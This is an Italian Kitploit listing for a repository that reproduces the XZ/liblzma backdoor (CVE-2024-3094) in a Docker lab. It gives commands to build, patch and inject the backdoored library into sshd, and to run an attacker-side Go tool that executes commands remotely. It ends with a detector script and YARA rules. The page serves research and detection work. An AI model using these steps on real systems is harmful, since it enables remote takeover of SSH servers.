Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-3094 — Una vulnerabilità backdoor XZ spiegata in dettaglio | Kitploit
Strumenti/GitHubGitHub/valeriot30/cve-2024-3094
Analisi delle VulnerabilitàExploitAnalisi MalwareAnalisi di BinariApprendimento e FormazioneLab e Pratica
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

Una vulnerabilità backdoor XZ spiegata in dettaglio

Vedi Repository
1131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ Progetto di Cybersecurity: Analisi della Backdoor XZ in liblzma

📄 Panoramica

Questo progetto analizza la backdoor di alto profilo scoperta in xz-utils (liblzma), che interessa le versioni 5.6.0 e 5.6.1. Il codice dannoso introdotto nel sistema di build upstream prendeva di mira l'autenticazione SSH modificando il modo in cui sshd interagisce con la libreria di compressione LZMA in fase di esecuzione.

⚠️ Questo progetto è esclusivamente a scopo di ricerca educativa e difensiva.

Macchina vulnerabile

Clona questo repository

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Naviga nella directory

root@kitploit:~
cd cve-2024-3094

Avvia il container docker

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

Ottieni una versione dannosa della libreria

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~
Scarica lo strumento

Esporta il target di build

root@kitploit:~
export RPM_ARCH=$(uname -m)

Compila la libreria dannosa

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

Copia il file SO dannoso all'esterno:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

Clona nuovamente il repository all'interno del container

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Applica la patch alla libreria liblzma con una chiave personalizzata

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

Collega la libreria dannosa nel sistema

root@kitploit:~
 sh cve-2024-3094/inject.sh

Esegui sshd collegato alla libreria dannosa

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

Macchina dell'attaccante

Clona questo repository

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

Naviga nella directory

root@kitploit:~
cd cve-2024-3094

Compila lo strumento GO

root@kitploit:~
go build

Usa lo strumento inserendo l'indirizzo IP della macchina vulnerabile e il comando da eseguire

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

Contromisure

Utilizzo del detector

Esegui il detector

root@kitploit:~
sh detector.sh

Utilizzo di Yara

Usa le regole di corrispondenza yara

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s